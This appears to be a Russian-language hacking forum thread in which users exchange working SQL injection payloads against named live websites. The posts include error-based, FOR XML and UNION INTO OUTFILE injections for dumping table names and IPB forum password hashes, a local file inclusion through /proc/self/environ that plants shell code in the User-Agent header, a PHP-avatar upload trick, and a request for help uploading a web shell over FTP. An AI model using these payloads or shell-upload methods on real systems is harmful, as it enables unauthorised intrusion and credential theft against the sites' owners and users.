вот еще одна гимморная скуль: http://www.caffmoscommunity.com/show_review.asp?rid=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- а вот вывести имя второй таблицы уже проблема
Еще 15 минут назад сам не знал. но использовал гугл http://www.caffmoscommunity.com/show_review.asp?rid=%28SELECT+TABLE_NAME+FROM+%20INFORMATION_SCHEMA.TABLES%20for%20xml%20raw%29-- Информацию получил с http://raz0r.name/obzory/select-for-xml-sql-injection/
Нуждаюсь в помощис флуром. типо самописный модуль для ipb 1.31 урл засветить к сожалению не могу. запрос возвращающий юзера: result: пробую выбирать из таблы: и получаю:
да, вот что заметил, нормально могу читать все таблы, кроме тех, который начинаются на ibf_ . Хотя структуру их я могу смотреть, а "get data" нет =( есть мысли?
#Wolf#, попробуй - Code: id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ------------------- Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее тут _http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00 в User-Agent пишешь код шелла. ------------------- http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=4 -> false http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=5 -> true
Как правильно составить двойной запрос? PHP: function recordcount_new($ps_sql){ global $conn_s; $rs_s2 = mysql_query("select COUNT(CODE) as count1 from ".$ps_sql,$conn_s); $rs_s=mysql_fetch_array($rs_s2); $pi_recordcount = $rs_s['count1']; mysql_free_result($rs_s2); if ($pi_recordcount=="") $pi_recordcount=0; return $pi_recordcount; } PHP: $rs_2 = mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1); while (($rs=mysql_fetch_assoc($rs_2))!==false) { $pi2=recordcount_new("tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'].")"); if ($pi2>0) echo ' <i>('.$pi2.')</i>'; } -1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f757466696c652b5c27312e7478745c272d2d http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f757466696c652b5c27312e7478745c272d2d,2,version(),4--
Имеется доступ фтп к серверу (Topserver), как узнать директорию доступную на запись (или поменять права на запись) и залить шел если можно попобробней, а то я в этом не особо опытный!